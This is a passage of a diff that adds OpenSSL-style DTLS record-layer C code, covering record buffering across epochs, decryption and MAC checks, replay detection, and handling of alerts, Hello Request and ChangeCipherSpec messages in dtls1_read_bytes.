+                 sizeof(rdata->recordinfo), &rdata->recordinfo);
+    }
+#endif
+
+    s->packet = NULL;
+    s->packet_length = 0;
+    memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));
+    memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));
+
+    if (!ssl3_setup_buffers(s)) {
+        SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
+        if (rdata->rbuf.buf != NULL)
+            OPENSSL_free(rdata->rbuf.buf);
+        OPENSSL_free(rdata);
+        pitem_free(item);
+        return (-1);
+    }
+
+    /* insert should not fail, since duplicates are dropped */
+    if (pqueue_insert(queue->q, item) == NULL) {
+        SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
+        if (rdata->rbuf.buf != NULL)
+            OPENSSL_free(rdata->rbuf.buf);
+        OPENSSL_free(rdata);
+        pitem_free(item);
+        return (-1);
+    }
+
+    return (1);
+}
+
+static int dtls1_retrieve_buffered_record(SSL *s, record_pqueue *queue)
+{
+    pitem *item;
+
+    item = pqueue_pop(queue->q);
+    if (item) {
+        dtls1_copy_record(s, item);
+
+        OPENSSL_free(item->data);
+        pitem_free(item);
+
+        return (1);
+    }
+
+    return (0);
+}
+
+/*
+ * retrieve a buffered record that belongs to the new epoch, i.e., not
+ * processed yet
+ */
+#define dtls1_get_unprocessed_record(s) \
+                   dtls1_retrieve_buffered_record((s), \
+                   &((s)->d1->unprocessed_rcds))
+
+/*
+ * retrieve a buffered record that belongs to the current epoch, ie,
+ * processed
+ */
+#define dtls1_get_processed_record(s) \
+                   dtls1_retrieve_buffered_record((s), \
+                   &((s)->d1->processed_rcds))
+
+static int dtls1_process_buffered_records(SSL *s)
+{
+    pitem *item;
+
+    item = pqueue_peek(s->d1->unprocessed_rcds.q);
+    if (item) {
+        /* Check if epoch is current. */
+        if (s->d1->unprocessed_rcds.epoch != s->d1->r_epoch)
+            return (1);         /* Nothing to do. */
+
+        /* Process all the records. */
+        while (pqueue_peek(s->d1->unprocessed_rcds.q)) {
+            dtls1_get_unprocessed_record(s);
+            if (!dtls1_process_record(s))
+                return (0);
+            if (dtls1_buffer_record(s, &(s->d1->processed_rcds),
+                                    s->s3->rrec.seq_num) < 0)
+                return -1;
+        }
+    }
+
+    /*
+     * sync epoch numbers once all the unprocessed records have been
+     * processed
+     */
+    s->d1->processed_rcds.epoch = s->d1->r_epoch;
+    s->d1->unprocessed_rcds.epoch = s->d1->r_epoch + 1;
+
+    return (1);
+}
+
+#if 0
+
+static int dtls1_get_buffered_record(SSL *s)
+{
+    pitem *item;
+    PQ_64BIT priority =
+        (((PQ_64BIT) s->d1->handshake_read_seq) << 32) |
+        ((PQ_64BIT) s->d1->r_msg_hdr.frag_off);
+
+    /* if we're not (re)negotiating, nothing buffered */
+    if (!SSL_in_init(s))
+        return 0;
+
+    item = pqueue_peek(s->d1->rcvd_records);
+    if (item && item->priority == priority) {
+        /*
+         * Check if we've received the record of interest.  It must be a
+         * handshake record, since data records as passed up without
+         * buffering
+         */
+        DTLS1_RECORD_DATA *rdata;
+        item = pqueue_pop(s->d1->rcvd_records);
+        rdata = (DTLS1_RECORD_DATA *)item->data;
+
+        if (s->s3->rbuf.buf != NULL)
+            OPENSSL_free(s->s3->rbuf.buf);
+
+        s->packet = rdata->packet;
+        s->packet_length = rdata->packet_length;
+        memcpy(&(s->s3->rbuf), &(rdata->rbuf), sizeof(SSL3_BUFFER));
+        memcpy(&(s->s3->rrec), &(rdata->rrec), sizeof(SSL3_RECORD));
+
+        OPENSSL_free(item->data);
+        pitem_free(item);
+
+        /* s->d1->next_expected_seq_num++; */
+        return (1);
+    }
+
+    return 0;
+}
+
+#endif
+
+static int dtls1_process_record(SSL *s)
+{
+    int i, al;
+    int enc_err;
+    SSL_SESSION *sess;
+    SSL3_RECORD *rr;
+    unsigned int mac_size, orig_len;
+    unsigned char md[EVP_MAX_MD_SIZE];
+
+    rr = &(s->s3->rrec);
+    sess = s->session;
+
+    /*
+     * At this point, s->packet_length == SSL3_RT_HEADER_LNGTH + rr->length,
+     * and we have that many bytes in s->packet
+     */
+    rr->input = &(s->packet[DTLS1_RT_HEADER_LENGTH]);
+
+    /*
+     * ok, we can now read from 's->packet' data into 'rr' rr->input points
+     * at rr->length bytes, which need to be copied into rr->data by either
+     * the decryption or by the decompression When the data is 'copied' into
+     * the rr->data buffer, rr->input will be pointed at the new buffer
+     */
+
+    /*
+     * We now have - encrypted [ MAC [ compressed [ plain ] ] ] rr->length
+     * bytes of encrypted compressed stuff.
+     */
+
+    /* check is not needed I believe */
+    if (rr->length > SSL3_RT_MAX_ENCRYPTED_LENGTH) {
+        al = SSL_AD_RECORD_OVERFLOW;
+        SSLerr(SSL_F_DTLS1_PROCESS_RECORD, SSL_R_ENCRYPTED_LENGTH_TOO_LONG);
+        goto f_err;
+    }
+
+    /* decrypt in place in 'rr->input' */
+    rr->data = rr->input;
+
+    enc_err = s->method->ssl3_enc->enc(s, 0);
+    /*-
+     * enc_err is:
+     *    0: (in non-constant time) if the record is publically invalid.
+     *    1: if the padding is valid
+     *   -1: if the padding is invalid
+     */
+    if (enc_err == 0) {
+        /* For DTLS we simply ignore bad packets. */
+        rr->length = 0;
+        s->packet_length = 0;
+        goto err;
+    }
+#ifdef TLS_DEBUG
+    printf("dec %d\n", rr->length);
+    {
+        unsigned int z;
+        for (z = 0; z < rr->length; z++)
+            printf("%02X%c", rr->data[z], ((z + 1) % 16) ? ' ' : '\n');
+    }
+    printf("\n");
+#endif
+
+    /* r->length is now the compressed data plus mac */
+    if ((sess != NULL) &&
+        (s->enc_read_ctx != NULL) && (EVP_MD_CTX_md(s->read_hash) != NULL)) {
+        /* s->read_hash != NULL => mac_size != -1 */
+        unsigned char *mac = NULL;
+        unsigned char mac_tmp[EVP_MAX_MD_SIZE];
+        mac_size = EVP_MD_CTX_size(s->read_hash);
+        OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
+
+        /*
+         * kludge: *_cbc_remove_padding passes padding length in rr->type
+         */
+        orig_len = rr->length + ((unsigned int)rr->type >> 8);
+
+        /*
+         * orig_len is the length of the record before any padding was
+         * removed. This is public information, as is the MAC in use,
+         * therefore we can safely process the record in a different amount
+         * of time if it's too short to possibly contain a MAC.
+         */
+        if (orig_len < mac_size ||
+            /* CBC records must have a padding length byte too. */
+            (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
+             orig_len < mac_size + 1)) {
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_DTLS1_PROCESS_RECORD, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+
+        if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE) {
+            /*
+             * We update the length so that the TLS header bytes can be
+             * constructed correctly but we need to extract the MAC in
+             * constant time from within the record, without leaking the
+             * contents of the padding bytes.
+             */
+            mac = mac_tmp;
+            ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
+            rr->length -= mac_size;
+        } else {
+            /*
+             * In this case there's no padding, so |orig_len| equals
+             * |rec->length| and we checked that there's enough bytes for
+             * |mac_size| above.
+             */
+            rr->length -= mac_size;
+            mac = &rr->data[rr->length];
+        }
+
+        i = s->method->ssl3_enc->mac(s, md, 0 /* not send */ );
+        if (i < 0 || mac == NULL
+            || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
+            enc_err = -1;
+        if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH + mac_size)
+            enc_err = -1;
+    }
+
+    if (enc_err < 0) {
+        /* decryption failed, silently discard message */
+        rr->length = 0;
+        s->packet_length = 0;
+        goto err;
+    }
+
+    /* r->length is now just compressed */
+    if (s->expand != NULL) {
+        if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {
+            al = SSL_AD_RECORD_OVERFLOW;
+            SSLerr(SSL_F_DTLS1_PROCESS_RECORD,
+                   SSL_R_COMPRESSED_LENGTH_TOO_LONG);
+            goto f_err;
+        }
+        if (!ssl3_do_uncompress(s)) {
+            al = SSL_AD_DECOMPRESSION_FAILURE;
+            SSLerr(SSL_F_DTLS1_PROCESS_RECORD, SSL_R_BAD_DECOMPRESSION);
+            goto f_err;
+        }
+    }
+
+    if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {
+        al = SSL_AD_RECORD_OVERFLOW;
+        SSLerr(SSL_F_DTLS1_PROCESS_RECORD, SSL_R_DATA_LENGTH_TOO_LONG);
+        goto f_err;
+    }
+
+    rr->off = 0;
+    /*-
+     * So at this point the following is true
+     * ssl->s3->rrec.type   is the type of record
+     * ssl->s3->rrec.length == number of bytes in record
+     * ssl->s3->rrec.off    == offset to first valid byte
+     * ssl->s3->rrec.data   == where to take bytes from, increment
+     *                         after use :-).
+     */
+
+    /* we have pulled in a full packet so zero things */
+    s->packet_length = 0;
+    return (1);
+
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+ err:
+    return (0);
+}
+
+/*-
+ * Call this to get a new input record.
+ * It will return <= 0 if more data is needed, normally due to an error
+ * or non-blocking IO.
+ * When it finishes, one packet has been decoded and can be found in
+ * ssl->s3->rrec.type    - is the type of record
+ * ssl->s3->rrec.data,   - data
+ * ssl->s3->rrec.length, - number of bytes
+ */
+/* used only by dtls1_read_bytes */
+int dtls1_get_record(SSL *s)
+{
+    int ssl_major, ssl_minor;
+    int i, n;
+    SSL3_RECORD *rr;
+    unsigned char *p = NULL;
+    unsigned short version;
+    DTLS1_BITMAP *bitmap;
+    unsigned int is_next_epoch;
+
+    rr = &(s->s3->rrec);
+
+    /*
+     * The epoch may have changed.  If so, process all the pending records.
+     * This is a non-blocking operation.
+     */
+    if (dtls1_process_buffered_records(s) < 0)
+        return -1;
+
+    /* if we're renegotiating, then there may be buffered records */
+    if (dtls1_get_processed_record(s))
+        return 1;
+
+    /* get something from the wire */
+ again:
+    /* check if we have the header */
+    if ((s->rstate != SSL_ST_READ_BODY) ||
+        (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {
+        n = ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
+        /* read timeout is handled by dtls1_read_bytes */
+        if (n <= 0)
+            return (n);         /* error or non-blocking */
+
+        /* this packet contained a partial record, dump it */
+        if (s->packet_length != DTLS1_RT_HEADER_LENGTH) {
+            s->packet_length = 0;
+            goto again;
+        }
+
+        s->rstate = SSL_ST_READ_BODY;
+
+        p = s->packet;
+
+        if (s->msg_callback)
+            s->msg_callback(0, 0, SSL3_RT_HEADER, p, DTLS1_RT_HEADER_LENGTH,
+                            s, s->msg_callback_arg);
+
+        /* Pull apart the header into the DTLS1_RECORD */
+        rr->type = *(p++);
+        ssl_major = *(p++);
+        ssl_minor = *(p++);
+        version = (ssl_major << 8) | ssl_minor;
+
+        /* sequence number is 64 bits, with top 2 bytes = epoch */
+        n2s(p, rr->epoch);
+
+        memcpy(&(s->s3->read_sequence[2]), p, 6);
+        p += 6;
+
+        n2s(p, rr->length);
+
+        /* Lets check version */
+        if (!s->first_packet) {
+            if (version != s->version) {
+                /* unexpected version, silently discard */
+                rr->length = 0;
+                s->packet_length = 0;
+                goto again;
+            }
+        }
+
+        if ((version & 0xff00) != (s->version & 0xff00)) {
+            /* wrong version, silently discard record */
+            rr->length = 0;
+            s->packet_length = 0;
+            goto again;
+        }
+
+        if (rr->length > SSL3_RT_MAX_ENCRYPTED_LENGTH) {
+            /* record too long, silently discard it */
+            rr->length = 0;
+            s->packet_length = 0;
+            goto again;
+        }
+
+        /* now s->rstate == SSL_ST_READ_BODY */
+    }
+
+    /* s->rstate == SSL_ST_READ_BODY, get and decode the data */
+
+    if (rr->length > s->packet_length - DTLS1_RT_HEADER_LENGTH) {
+        /* now s->packet_length == DTLS1_RT_HEADER_LENGTH */
+        i = rr->length;
+        n = ssl3_read_n(s, i, i, 1);
+        /* this packet contained a partial record, dump it */
+        if (n != i) {
+            rr->length = 0;
+            s->packet_length = 0;
+            goto again;
+        }
+
+        /*
+         * now n == rr->length, and s->packet_length ==
+         * DTLS1_RT_HEADER_LENGTH + rr->length
+         */
+    }
+    s->rstate = SSL_ST_READ_HEADER; /* set state for later operations */
+
+    /* match epochs.  NULL means the packet is dropped on the floor */
+    bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);
+    if (bitmap == NULL) {
+        rr->length = 0;
+        s->packet_length = 0;   /* dump this record */
+        goto again;             /* get another record */
+    }
+#ifndef OPENSSL_NO_SCTP
+    /* Only do replay check if no SCTP bio */
+    if (!BIO_dgram_is_sctp(SSL_get_rbio(s))) {
+#endif
+        /*
+         * Check whether this is a repeat, or aged record. Don't check if
+         * we're listening and this message is a ClientHello. They can look
+         * as if they're replayed, since they arrive from different
+         * connections and would be dropped unnecessarily.
+         */
+        if (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&
+              s->packet_length > DTLS1_RT_HEADER_LENGTH &&
+              s->packet[DTLS1_RT_HEADER_LENGTH] == SSL3_MT_CLIENT_HELLO) &&
+            !dtls1_record_replay_check(s, bitmap)) {
+            rr->length = 0;
+            s->packet_length = 0; /* dump this record */
+            goto again;         /* get another record */
+        }
+#ifndef OPENSSL_NO_SCTP
+    }
+#endif
+
+    /* just read a 0 length packet */
+    if (rr->length == 0)
+        goto again;
+
+    /*
+     * If this record is from the next epoch (either HM or ALERT), and a
+     * handshake is currently in progress, buffer it since it cannot be
+     * processed at this time. However, do not buffer anything while
+     * listening.
+     */
+    if (is_next_epoch) {
+        if ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen) {
+            if (dtls1_buffer_record
+                (s, &(s->d1->unprocessed_rcds), rr->seq_num) < 0)
+                return -1;
+            /* Mark receipt of record. */
+            dtls1_record_bitmap_update(s, bitmap);
+        }
+        rr->length = 0;
+        s->packet_length = 0;
+        goto again;
+    }
+
+    if (!dtls1_process_record(s)) {
+        rr->length = 0;
+        s->packet_length = 0;   /* dump this record */
+        goto again;             /* get another record */
+    }
+    dtls1_record_bitmap_update(s, bitmap); /* Mark receipt of record. */
+
+    return (1);
+
+}
+
+/*-
+ * Return up to 'len' payload bytes received in 'type' records.
+ * 'type' is one of the following:
+ *
+ *   -  SSL3_RT_HANDSHAKE (when ssl3_get_message calls us)
+ *   -  SSL3_RT_APPLICATION_DATA (when ssl3_read calls us)
+ *   -  0 (during a shutdown, no data has to be returned)
+ *
+ * If we don't have stored data to work from, read a SSL/TLS record first
+ * (possibly multiple records if we still don't have anything to return).
+ *
+ * This function must handle any surprises the peer may have for us, such as
+ * Alert records (e.g. close_notify), ChangeCipherSpec records (not really
+ * a surprise, but handled as if it were), or renegotiation requests.
+ * Also if record payloads contain fragments too small to process, we store
+ * them until there is enough for the respective protocol (the record protocol
+ * may use arbitrary fragmentation and even interleaving):
+ *     Change cipher spec protocol
+ *             just 1 byte needed, no need for keeping anything stored
+ *     Alert protocol
+ *             2 bytes needed (AlertLevel, AlertDescription)
+ *     Handshake protocol
+ *             4 bytes needed (HandshakeType, uint24 length) -- we just have
+ *             to detect unexpected Client Hello and Hello Request messages
+ *             here, anything else is handled by higher layers
+ *     Application data protocol
+ *             none of our business
+ */
+int dtls1_read_bytes(SSL *s, int type, unsigned char *buf, int len, int peek)
+{
+    int al, i, j, ret;
+    unsigned int n;
+    SSL3_RECORD *rr;
+    void (*cb) (const SSL *ssl, int type2, int val) = NULL;
+
+    if (s->s3->rbuf.buf == NULL) /* Not initialized yet */
+        if (!ssl3_setup_buffers(s))
+            return (-1);
+
+    /* XXX: check what the second '&& type' is about */
+    if ((type && (type != SSL3_RT_APPLICATION_DATA) &&
+         (type != SSL3_RT_HANDSHAKE) && type) ||
+        (peek && (type != SSL3_RT_APPLICATION_DATA))) {
+        SSLerr(SSL_F_DTLS1_READ_BYTES, ERR_R_INTERNAL_ERROR);
+        return -1;
+    }
+
+    /*
+     * check whether there's a handshake message (client hello?) waiting
+     */
+    if ((ret = have_handshake_fragment(s, type, buf, len, peek)))
+        return ret;
+
+    /*
+     * Now s->d1->handshake_fragment_len == 0 if type == SSL3_RT_HANDSHAKE.
+     */
+
+#ifndef OPENSSL_NO_SCTP
+    /*
+     * Continue handshake if it had to be interrupted to read app data with
+     * SCTP.
+     */
+    if ((!s->in_handshake && SSL_in_init(s)) ||
+        (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&
+         (s->state == DTLS1_SCTP_ST_SR_READ_SOCK
+          || s->state == DTLS1_SCTP_ST_CR_READ_SOCK)
+         && s->s3->in_read_app_data != 2))
+#else
+    if (!s->in_handshake && SSL_in_init(s))
+#endif
+    {
+        /* type == SSL3_RT_APPLICATION_DATA */
+        i = s->handshake_func(s);
+        if (i < 0)
+            return (i);
+        if (i == 0) {
+            SSLerr(SSL_F_DTLS1_READ_BYTES, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return (-1);
+        }
+    }
+
+ start:
+    s->rwstate = SSL_NOTHING;
+
+    /*-
+     * s->s3->rrec.type         - is the type of record
+     * s->s3->rrec.data,    - data
+     * s->s3->rrec.off,     - offset into 'data' for next read
+     * s->s3->rrec.length,  - number of bytes.
+     */
+    rr = &(s->s3->rrec);
+
+    /*
+     * We are not handshaking and have no data yet, so process data buffered
+     * during the last handshake in advance, if any.
+     */
+    if (s->state == SSL_ST_OK && rr->length == 0) {
+        pitem *item;
+        item = pqueue_pop(s->d1->buffered_app_data.q);
+        if (item) {
+#ifndef OPENSSL_NO_SCTP
+            /* Restore bio_dgram_sctp_rcvinfo struct */
+            if (BIO_dgram_is_sctp(SSL_get_rbio(s))) {
+                DTLS1_RECORD_DATA *rdata = (DTLS1_RECORD_DATA *)item->data;
+                BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_SET_RCVINFO,
+                         sizeof(rdata->recordinfo), &rdata->recordinfo);
+            }
+#endif
+
+            dtls1_copy_record(s, item);
+
+            OPENSSL_free(item->data);
+            pitem_free(item);
+        }
+    }
+
+    /* Check for timeout */
+    if (dtls1_handle_timeout(s) > 0)
+        goto start;
+
+    /* get new packet if necessary */
+    if ((rr->length == 0) || (s->rstate == SSL_ST_READ_BODY)) {
+        ret = dtls1_get_record(s);
+        if (ret <= 0) {
+            ret = dtls1_read_failed(s, ret);
+            /* anything other than a timeout is an error */
+            if (ret <= 0)
+                return (ret);
+            else
+                goto start;
+        }
+    }
+
+    if (s->d1->listen && rr->type != SSL3_RT_HANDSHAKE) {
+        rr->length = 0;
+        goto start;
+    }
+
+    /* we now have a packet which can be read and processed */
+
+    if (s->s3->change_cipher_spec /* set when we receive ChangeCipherSpec,
+                                   * reset by ssl3_get_finished */
+        && (rr->type != SSL3_RT_HANDSHAKE)) {
+        /*
+         * We now have application data between CCS and Finished. Most likely
+         * the packets were reordered on their way, so buffer the application
+         * data for later processing rather than dropping the connection.
+         */
+        if (dtls1_buffer_record(s, &(s->d1->buffered_app_data), rr->seq_num) <
+            0) {
+            SSLerr(SSL_F_DTLS1_READ_BYTES, ERR_R_INTERNAL_ERROR);
+            return -1;
+        }
+        rr->length = 0;
+        goto start;
+    }
+
+    /*
+     * If the other end has shut down, throw anything we read away (even in
+     * 'peek' mode)
+     */
+    if (s->shutdown & SSL_RECEIVED_SHUTDOWN) {
+        rr->length = 0;
+        s->rwstate = SSL_NOTHING;
+        return (0);
+    }
+
+    if (type == rr->type) {     /* SSL3_RT_APPLICATION_DATA or
+                                 * SSL3_RT_HANDSHAKE */
+        /*
+         * make sure that we are not getting application data when we are
+         * doing a handshake for the first time
+         */
+        if (SSL_in_init(s) && (type == SSL3_RT_APPLICATION_DATA) &&
+            (s->enc_read_ctx == NULL)) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_DTLS1_READ_BYTES, SSL_R_APP_DATA_IN_HANDSHAKE);
+            goto f_err;
+        }
+
+        if (len <= 0)
+            return (len);
+
+        if ((unsigned int)len > rr->length)
+            n = rr->length;
+        else
+            n = (unsigned int)len;
+
+        memcpy(buf, &(rr->data[rr->off]), n);
+        if (!peek) {
+            rr->length -= n;
+            rr->off += n;
+            if (rr->length == 0) {
+                s->rstate = SSL_ST_READ_HEADER;
+                rr->off = 0;
+            }
+        }
+#ifndef OPENSSL_NO_SCTP
+        /*
+         * We were about to renegotiate but had to read belated application
+         * data first, so retry.
+         */
+        if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&
+            rr->type == SSL3_RT_APPLICATION_DATA &&
+            (s->state == DTLS1_SCTP_ST_SR_READ_SOCK
+             || s->state == DTLS1_SCTP_ST_CR_READ_SOCK)) {
+            s->rwstate = SSL_READING;
+            BIO_clear_retry_flags(SSL_get_rbio(s));
+            BIO_set_retry_read(SSL_get_rbio(s));
+        }
+
+        /*
+         * We might had to delay a close_notify alert because of reordered
+         * app data. If there was an alert and there is no message to read
+         * anymore, finally set shutdown.
+         */
+        if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&
+            s->d1->shutdown_received
+            && !BIO_dgram_sctp_msg_waiting(SSL_get_rbio(s))) {
+            s->shutdown |= SSL_RECEIVED_SHUTDOWN;
+            return (0);
+        }
+#endif
+        return (n);
+    }
+
+    /*
+     * If we get here, then type != rr->type; if we have a handshake message,
+     * then it was unexpected (Hello Request or Client Hello).
+     */
+
+    /*
+     * In case of record types for which we have 'fragment' storage, fill
+     * that so that we can process the data at a fixed place.
+     */
+    {
+        unsigned int k, dest_maxlen = 0;
+        unsigned char *dest = NULL;
+        unsigned int *dest_len = NULL;
+
+        if (rr->type == SSL3_RT_HANDSHAKE) {
+            dest_maxlen = sizeof s->d1->handshake_fragment;
+            dest = s->d1->handshake_fragment;
+            dest_len = &s->d1->handshake_fragment_len;
+        } else if (rr->type == SSL3_RT_ALERT) {
+            dest_maxlen = sizeof(s->d1->alert_fragment);
+            dest = s->d1->alert_fragment;
+            dest_len = &s->d1->alert_fragment_len;
+        }
+#ifndef OPENSSL_NO_HEARTBEATS
+        else if (rr->type == TLS1_RT_HEARTBEAT) {
+            dtls1_process_heartbeat(s);
+
+            /* Exit and notify application to read again */
+            rr->length = 0;
+            s->rwstate = SSL_READING;
+            BIO_clear_retry_flags(SSL_get_rbio(s));
+            BIO_set_retry_read(SSL_get_rbio(s));
+            return (-1);
+        }
+#endif
+        /* else it's a CCS message, or application data or wrong */
+        else if (rr->type != SSL3_RT_CHANGE_CIPHER_SPEC) {
+            /*
+             * Application data while renegotiating is allowed. Try again
+             * reading.
+             */
+            if (rr->type == SSL3_RT_APPLICATION_DATA) {
+                BIO *bio;
+                s->s3->in_read_app_data = 2;
+                bio = SSL_get_rbio(s);
+                s->rwstate = SSL_READING;
+                BIO_clear_retry_flags(bio);
+                BIO_set_retry_read(bio);
+                return (-1);
+            }
+
+            /* Not certain if this is the right error handling */
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_DTLS1_READ_BYTES, SSL_R_UNEXPECTED_RECORD);
+            goto f_err;
+        }
+
+        if (dest_maxlen > 0) {
+            /*
+             * XDTLS: In a pathalogical case, the Client Hello may be
+             * fragmented--don't always expect dest_maxlen bytes
+             */
+            if (rr->length < dest_maxlen) {
+#ifdef DTLS1_AD_MISSING_HANDSHAKE_MESSAGE
+                /*
+                 * for normal alerts rr->length is 2, while
+                 * dest_maxlen is 7 if we were to handle this
+                 * non-existing alert...
+                 */
+                FIX ME
+#endif
+                 s->rstate = SSL_ST_READ_HEADER;
+                rr->length = 0;
+                goto start;
+            }
+
+            /* now move 'n' bytes: */
+            for (k = 0; k < dest_maxlen; k++) {
+                dest[k] = rr->data[rr->off++];
+                rr->length--;
+            }
+            *dest_len = dest_maxlen;
+        }
+    }
+
+    /*-
+     * s->d1->handshake_fragment_len == 12  iff  rr->type == SSL3_RT_HANDSHAKE;
+     * s->d1->alert_fragment_len == 7      iff  rr->type == SSL3_RT_ALERT.
+     * (Possibly rr is 'empty' now, i.e. rr->length may be 0.)
+     */
+
+    /* If we are a client, check for an incoming 'Hello Request': */
+    if ((!s->server) &&
+        (s->d1->handshake_fragment_len >= DTLS1_HM_HEADER_LENGTH) &&
+        (s->d1->handshake_fragment[0] == SSL3_MT_HELLO_REQUEST) &&
+        (s->session != NULL) && (s->session->cipher != NULL)) {
+        s->d1->handshake_fragment_len = 0;
+
+        if ((s->d1->handshake_fragment[1] != 0) ||
+            (s->d1->handshake_fragment[2] != 0) ||
+            (s->d1->handshake_fragment[3] != 0)) {
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_DTLS1_READ_BYTES, SSL_R_BAD_HELLO_REQUEST);
+            goto err;
+        }
+
+        /*
+         * no need to check sequence number on HELLO REQUEST messages
+         */
+
+        if (s->msg_callback)
+            s->msg_callback(0, s->version, SSL3_RT_HANDSHAKE,
+                            s->d1->handshake_fragment, 4, s,
+                            s->msg_callback_arg);
+
+        if (SSL_is_init_finished(s) &&
+            !(s->s3->flags & SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS) &&
+            !s->s3->renegotiate) {
+            s->d1->handshake_read_seq++;
+            s->new_session = 1;
+            ssl3_renegotiate(s);
+            if (ssl3_renegotiate_check(s)) {
+                i = s->handshake_func(s);
+                if (i < 0)
+                    return (i);
+                if (i == 0) {
+                    SSLerr(SSL_F_DTLS1_READ_BYTES,
+                           SSL_R_SSL_HANDSHAKE_FAILURE);
+                    return (-1);
+                }
+
+                if (!(s->mode & SSL_MODE_AUTO_RETRY)) {
+                    if (s->s3->rbuf.left == 0) { /* no read-ahead left? */
+                        BIO *bio;
+                        /*
+                         * In the case where we try to read application data,
+                         * but we trigger an SSL handshake, we return -1 with
+                         * the retry option set.  Otherwise renegotiation may
+                         * cause nasty problems in the blocking world
+                         */
+                        s->rwstate = SSL_READING;
+                        bio = SSL_get_rbio(s);
+                        BIO_clear_retry_flags(bio);
+                        BIO_set_retry_read(bio);
+                        return (-1);
+                    }
+                }
+            }
+        }
+        /*
+         * we either finished a handshake or ignored the request, now try
+         * again to obtain the (application) data we were asked for
+         */
+        goto start;
+    }
+
+    if (s->d1->alert_fragment_len >= DTLS1_AL_HEADER_LENGTH) {
+        int alert_level = s->d1->alert_fragment[0];
+        int alert_descr = s->d1->alert_fragment[1];
+
+        s->d1->alert_fragment_len = 0;
+
+        if (s->msg_callback)
+            s->msg_callback(0, s->version, SSL3_RT_ALERT,
+                            s->d1->alert_fragment, 2, s, s->msg_callback_arg);
+
+        if (s->info_callback != NULL)
+            cb = s->info_callback;
+        else if (s->ctx->info_callback != NULL)
+            cb = s->ctx->info_callback;
+
+        if (cb != NULL) {
+            j = (alert_level << 8) | alert_descr;
+            cb(s, SSL_CB_READ_ALERT, j);
+        }
+
+        if (alert_level == 1) { /* warning */
+            s->s3->warn_alert = alert_descr;
+            if (alert_descr == SSL_AD_CLOSE_NOTIFY) {
+#ifndef OPENSSL_NO_SCTP
+                /*
+                 * With SCTP and streams the socket may deliver app data
+                 * after a close_notify alert. We have to check this first so
+                 * that nothing gets discarded.
+                 */
+                if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&
+                    BIO_dgram_sctp_msg_waiting(SSL_get_rbio(s))) {
+                    s->d1->shutdown_received = 1;
+                    s->rwstate = SSL_READING;
+                    BIO_clear_retry_flags(SSL_get_rbio(s));
+                    BIO_set_retry_read(SSL_get_rbio(s));
+                    return -1;
+                }
+#endif
+                s->shutdown |= SSL_RECEIVED_SHUTDOWN;
+                return (0);
+            }
+#if 0
+            /* XXX: this is a possible improvement in the future */
+            /* now check if it's a missing record */
+            if (alert_descr == DTLS1_AD_MISSING_HANDSHAKE_MESSAGE) {
+                unsigned short seq;
+                unsigned int frag_off;
+                unsigned char *p = &(s->d1->alert_fragment[2]);
+
+                n2s(p, seq);
+                n2l3(p, frag_off);
+
+                dtls1_retransmit_message(s,
+                                         dtls1_get_queue_priority
+                                         (frag->msg_header.seq, 0), frag_off,
+                                         &found);
+                if (!found && SSL_in_init(s)) {
+                    /*
+                     * fprintf( stderr,"in init = %d\n", SSL_in_init(s));
+                     */
+                    /*
+                     * requested a message not yet sent, send an alert
+                     * ourselves
+                     */
+                    ssl3_send_alert(s, SSL3_AL_WARNING,
+                                    DTLS1_AD_MISSING_HANDSHAKE_MESSAGE);
+                }
+            }
+#endif
+        } else if (alert_level == 2) { /* fatal */
+            char tmp[16];
+
+            s->rwstate = SSL_NOTHING;
+            s->s3->fatal_alert = alert_descr;
+            SSLerr(SSL_F_DTLS1_READ_BYTES,
+                   SSL_AD_REASON_OFFSET + alert_descr);
+            BIO_snprintf(tmp, sizeof tmp, "%d", alert_descr);
+            ERR_add_error_data(2, "SSL alert number ", tmp);
+            s->shutdown |= SSL_RECEIVED_SHUTDOWN;
+            SSL_CTX_remove_session(s->ctx, s->session);
+            return (0);
+        } else {
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_DTLS1_READ_BYTES, SSL_R_UNKNOWN_ALERT_TYPE);
+            goto f_err;
+        }
+
+        goto start;
+    }
+
+    if (s->shutdown & SSL_SENT_SHUTDOWN) { /* but we have not received a
+                                            * shutdown */
+        s->rwstate = SSL_NOTHING;
+        rr->length = 0;
+        return (0);
+    }
+
+    if (rr->type == SSL3_RT_CHANGE_CIPHER_SPEC) {
+        struct ccs_header_st ccs_hdr;
+        unsigned int ccs_hdr_len = DTLS1_CCS_HEADER_LENGTH;
+
+        dtls1_get_ccs_header(rr->data, &ccs_hdr);
+
+        if (s->version == DTLS1_BAD_VER)
+            ccs_hdr_len = 3;
+
+        /*
+         * 'Change Cipher Spec' is just a single byte, so we know exactly
+         * what the record payload has to look like
+         */
